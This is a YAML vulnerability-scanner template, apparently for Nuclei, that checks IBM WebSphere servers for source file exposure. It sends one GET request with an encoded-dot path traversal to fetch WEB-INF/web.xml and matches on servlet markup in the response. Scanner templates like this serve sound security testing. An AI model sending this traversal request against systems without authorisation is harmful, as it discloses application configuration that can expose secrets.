id: ibm-websphere-xml

info:
  name: IBM WebSphere Application - Source File Exposure
  author: r3nz0
  severity: medium
  description: |
    Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
  metadata:
    verified: true
    max-request: 1
  tags: ibm,websphere,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "<servlet>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022053a84720c05af38b630403b310cf17369ec71bb8351b510a8f0e5e72412ee953022100ea75c8cc69cb4d320bcee4279981ce9b1d40b9f53138a3c92b32024be68dd8e2:922c64590222798bb761d5b6d8e72950